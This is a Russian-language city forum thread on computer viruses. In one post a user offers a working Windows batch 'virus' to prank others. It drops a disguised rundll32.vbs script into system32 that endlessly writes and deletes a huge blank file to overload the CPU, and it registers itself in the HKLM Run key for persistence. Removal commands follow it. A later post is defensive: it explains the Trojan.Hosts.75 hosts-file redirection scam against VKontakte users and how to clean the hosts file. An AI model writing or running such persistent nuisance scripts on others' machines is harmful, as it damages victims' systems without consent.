Городской форум

ГОРОДСКОЙ ФОРУМ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » ГОРОДСКОЙ ФОРУМ » Интернет +Защита » ВИРУСЫ


ВИРУСЫ

Сообщений 1 страница 4 из 4

1

http://good73.7il.ru/viewtopic.php?id=476
ВИРУСЫ

ВОЗМОЖНО ЭТА ТЕМА ВАМ ПОМОЖЕТ БОРОТСЯ С ВИРУСАМИ (ЛИБО АНА ВАС ЗАГУБИТ)

0

2

как они надоели)))))))))

0

3

BAt-вирус
фенька от которой у бедного ламера будет глючить комп:

@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs

start %systemdrive%\windows\system32\rundll32.vbs

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

и вот это если вы уже случайно запустили у себя, или вам жалко того ламера:

TASKKILL /F /IM wsсriрt.exe
del c:\windows\rundll32.vbs
del c:\rundll32.sys
del d:\rundll32.sys

короче эта фигня будет создавать в папке систем32 файлик rundll32.dat в который будет прописывать много пустых строчек в этот файл тем самым он будет весить около 500 мб. Во время проспики будет сильно нагружаться цп. Как токо он всё запишет этот файл то он удалиться, и пойдет все заново, пока ламер не додумается завершить прцесс wsсriрt.exe

И еще это хрень прописывает ся в автозагрузку

0

4

И вот свершилось! что я впринципе и ожидал от вируса Trojan.Hosts.75
Вот и результат 135 000 пользователей под чистую взломаны, да и еще все логины и пароли выложили на всеобщее обозрение.
Хотя Администрация контакта реагирует быстро и лавочку быстро прикрыли. Кто успел их взять, тот имеет доступ ко всем этим тысячам аккаунтам.

А это все из-за файлика host.
Правда успели мы помочь только 75 000 пользователям которые обращались за помощью на наш сайт.
Еще раз напоминаем - Проведя несколько часов в поисковиках, можно найти кучу всего полезного. ВКонтакте настолько популярен, что людей, которые хотят завладеть аккаунтами, туча, можно армию собрать. Вы спросите зачем?

Кто-то для рейтинга отсылает друзьям ни в чем не повинного взломанного аккаунта сообщения "Помогите! Пришлите СМС! Мама умирает" и т.д. Кто-то просто шутить над друзьями, а кто-то хочет получить всю информацию о человеке, не только безобидную - Фамилию и Имя, но и все пароли, на все сайты, в том числе и WebMoney, или просто навсего содрать всю информацию с компьютера с помощью вирусов, троянов и т.п. Деньги правят миром и убивают его. :)

И теперь подробней о вирусе! хотя уже много было написанно о вирусе Host. Много версий проникновения на ваш компьютер - программы, фейки, приложения и много чего. Но главное это результат - ваш логин и пароль от сайта Вконтакте.

Следите внимателей за тем, на что нажимаете! Не верьте никому, если присылают подозрительно сообщение!
Остерегайтесь мошенников, они следят за каждым вашим шагом, и тут же атакуют если вы где то сподкнулись.

Тут черный список всех возможных сайтов, программ, уловок, чтобы Вы остались без аккаунта и возможно без всего, что есть на компьютере.

НИКОГДА НЕ ПЕРЕХОДИТЕ С КОНТАКТОВ НА ДРУГИЕ ПОДОЗРИТЕЛЬНЫЕ САЙТЫ!

ЭТОТ ЧЕРНЫЙ СПИСОК ДЛЯ ТОГО, ЧТО БЫ ВЫ НЕ ЗАХОДИЛИ НА ЭТИ САЙТЫ, И НЕ КАЧАЛИ ЭТИ ПРОГРАММЫ!

ОН ПОЭТОМУ И НАЗЫВАЕТСЯ - "ЧЁРНЫЙ СПИСОК".

Если не можете зайти вконтакт мы поможем и с этим -Зайти в контакт, как зайти в контакт, заблокировали в контакте, заблокировали
5 мая 2009    Полезные советы    Просмотров: 58685

Добрый день дорогой посититель нашего сайта, если ты читаешь эти строки значит у тя приключилась беда или тебе просто интересно, и пусть уж лучше будет второе. В последние время участились ситуации когда пользователи просто немогу зайти на сайт и у них это происходит не 1 раз из за технических работ на сервере сайта или каких либо других тех проблем с компьютером или интернетом.
Другие методы востановления в контакте
Зачастую когда вы не можете зайти на такие сайты как:
mail.ru
vkontakte.ru
odnoklasniki.ru
yandex.ru и другие крупные портали или поисковые системы вы просто думаете, что это, что то у них или у вашего провайдера и вы абсолютно правы если вы не можите зайти 1 час или 1 день, а если вы уже 2 - 3 дня не можите зайти на эти сайты то тут уже что то у вас.

После того, как вы уже 3 день не могу зайти, а то и больше, не можете общаться со своими друзьями, читать почту или пользоваться услугами поисковых систем, смс активация в контакте, вы приходите в бешенство и у вас от отчаяния в голове всплывает только 1 выход из ситуации переустановка Windows, я вам могу сказать, что это не самая светлая идея, да конечно это вам 100% поможет, но есть намного проще способы, что бы устранить эту заминочку.

Зачастую такое начинает творится, когда вы скачаете какую нибуть программу "Кидало" - это программа не только может украсть у вас все пароли, а так же и ограничить вам доступ к любому сайту, зачастую этот самый сайт vkontakte.ru. и смс баннер в контакте

А вы вспомните какую программу вы качали последнюю, вспоминайте все программы, которые были связанны с сайтом vkontakte и в основном для поднятия рейтинга, вспомнили, а теперь припоминаете какое то странное непонятно откуда взявшееся черное окно, которое появилось буквально на 1 сек. и исчезло, оно примерно выглядело так:

картинки нет

это командная строка которую можно открыть через Пуск => Выполнить => cmd через неё можно делать что угодно, вот вам и сделали. Всё очень просто в Windows во всех версиях есть такой файлик hosts который находится Локальный диск С: => Windows => system32 => drivers => ect и в этой папке лежит он, у него нет расширения поэтому нажимаем на него второй кнопкой мыши (Правой) и в появившемся списке выбираем или "Как текст.." или нажимаем просто открыть 2ым кликом по нему и выбираем блокнот, его исходный вид должен выглядить так:

картинки нет

--------------------------------------------------------------------------------
если в нём еще есть какие то записи удалите их им тут делать нечего.
Т.е. - что бы у вас заработал в контакт - очистите содержимое HOSTS,
Все что ниже 127.0.0.1 localhost - НУЖНО УДАЛИТЬ!!!!!
Если у вас не получается сохранить hosts (пишет - не возможно, занято другим приложением, или ошибка) просто нажмите на правую кнопку мыши - свойства - и уберите галочку "Только для чтения"
--------------------------------------------------------------------------------
Этот файл отвечает за определение IP адреса домена, я вам приведу 1 простой пример:
Для примера, я беру всем вам известный сайт vkontakte.ru его IP 93.186.227.130 и так мы берём и выписываем в этот файлик на следующей строке после 127.0.0.1 localhost следующее 93.186.227.120, заметьте это IP vkontakte.ru только с 1 измененной цифрой далие через несколько пробелов пишем vkontakte.ru это должно у вас выглядеть вот так:

картинки нет

если у вас всё точно так же как и у меня, тогда сохраните его и попробуйте зайти на сайт vkontakte.ru, ну как успех, не зашло, вот и я о том же, теперь что бы вы опять смогли заходить на сайте уберите из файла то, что вы вписали, а именно: 93.186.227.120 vkontakte.ru 93.186.227.120 vkontakte.ru и будет вам счастье!
отправьте смс для активации в контакте - не отправляйте никогда

И теперь подробней о вирусе! хотя уже много было написанно о вирусе Host

Вирус Trojan.Hosts.75
16 июня 2009    Главная    Просмотров: 2277
Компания «Dr.Web» сообщила, что в июне 2009 года была обнаружена очередная угроза для пользователей интернета, новый троян - Trojan.Hosts.75. Вредоносная программа принадлежит к семейству Trojan.Hosts и вымогает деньги у зараженных пользователей популярной социальной сети «ВКонтакте». На сегодняшний день появилось около сотни различных модификаций этой угрозы.

Trojan.Hosts.75 редиректит пользователя на фейк - страницу, оформленную почти как vkontakte. Здесь, как бы от лица администрации сайта, пользователю предлагается зарегистрироваться в системе при помощи SMS-активации.

После запуска Trojan.Hosts.75 вирус запускает bat-файл, который, в свою очередь, изменяет файл hosts. После модифицирования он выглядит следующим образом:

При посещении одного из ресурсов, приведенных выше, с инфицированного компьютера, пользователь переходит на фальшивую страницу по адресу http://211.xx.xx.xx/index.html. Прописав в файл hosts уйму популярных интеренет-ресурсов, хакеры попытались тем самым увеличить вероятность попадания зараженного пользователя на сайт вымогателей.

В последнее время служба вирусного мониторинга компании «Доктор Веб» констатирует увеличение числа программ-вымогателей. Этот факт был отмечен и в нашем обзоре вирусной обстановки за май 2009 года.

Мы в очередной раз призываем пользователей не поддаваться на фишинговые провокации злоумышленников и не перечислять на их счета запрошенные суммы.

Как убрать смс баннер

. Много версий проникновения на ваш компьютер - программы, фейки, приложения и много чего. Но главное это результат - ваш логин и пароль от сайта Вконтакте.

Следите внимателей за тем, на что нажимаете! Не верьте никому, если присылают подозрительно сообщение!
Остерегайтесь мошенников, они следят за каждым вашим шагом, и тут же атакуют если вы где то сподкнулись.

увеличить

0

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»


Сделать таблицу

Строк: Ячеек: RusFF ©


Вы здесь » ГОРОДСКОЙ ФОРУМ » Интернет +Защита » ВИРУСЫ